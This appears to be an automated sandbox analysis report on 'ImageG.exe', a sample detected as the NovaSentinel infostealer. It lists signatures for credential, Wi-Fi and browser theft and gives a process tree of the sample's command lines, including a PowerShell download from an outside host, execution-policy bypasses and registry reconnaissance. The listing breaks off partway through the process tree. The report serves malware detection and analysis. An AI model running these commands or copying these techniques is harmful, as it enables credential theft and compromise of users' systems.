Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ImageG.exe

Overview

General Information

Sample name:ImageG.exe
Analysis ID:1639532
MD5:689a7bcc7adad07a5c755e294889cdf5
SHA1:96f07c4dfe98a4686bf8e2dd24b3037a8f92fcbd
SHA256:0d19a2454600a853532a0b93bad70831dfe6080b3142f87e4a22340931c819fa
Infos:

Detection

NovaSentinel
Score:100
Range:0 - 100
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected NovaSentinel
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Drops PE files to the startup folder
Drops large PE files
Found suspicious ZIP file
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Overwrites Mozilla Firefox settings
Performs DNS queries to domains with low reputation
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: Enumeration for 3rd Party Creds From CLI
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Too many similar processes found
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses 32bit PE files
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64native
  • ImageG.exe (PID: 7896 cmdline: "C:\Users\user\Desktop\ImageG.exe" MD5: 689A7BCC7ADAD07A5C755E294889CDF5)
    • ImageG.exe (PID: 5920 cmdline: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe MD5: B52FFEF8C47BD8ACCF7002418A029ED7)
      • dllhost.exe (PID: 8116 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • cmd.exe (PID: 480 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • chcp.com (PID: 4988 cmdline: chcp MD5: CA9A549C17932F9CAA154B5528EBD8D4)
      • cmd.exe (PID: 5912 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • WMIC.exe (PID: 7044 cmdline: wmic process where processid=7896 get ExecutablePath MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • ImageG.exe (PID: 6836 cmdline: "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: B52FFEF8C47BD8ACCF7002418A029ED7)
      • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /d /s /c "NET SESSION" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • net.exe (PID: 1872 cmdline: NET SESSION MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 784 cmdline: C:\Windows\system32\net1 SESSION MD5: BA0BCCC6029FBBE6D8B41197F252742F)
      • cmd.exe (PID: 4416 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 5600 cmdline: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 2608 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 7312 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1144 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 6160 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 4596 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 4280 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 4452 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 7976 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 2820 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8116 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1936 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1356 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8292 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8420 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 9048 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 9116 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • ImageG.exe (PID: 2672 cmdline: "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: B52FFEF8C47BD8ACCF7002418A029ED7)
      • cmd.exe (PID: 9292 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • findstr.exe (PID: 9400 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 9444 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9500 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9520 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9616 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9528 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9648 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • Conhost.exe (PID: 9996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9656 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9696 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9800 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9872 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9968 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 10104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 10128 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 10232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5052 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5528 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 7724 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8776 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8980 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8784 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 7420 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2500 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 6880 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 1592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8880 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • Conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 8908 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8220 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 4492 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1432 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8692 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1936 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 2328 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 3124 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1144 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9356 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9388 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9352 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9480 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9556 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9604 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9524 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
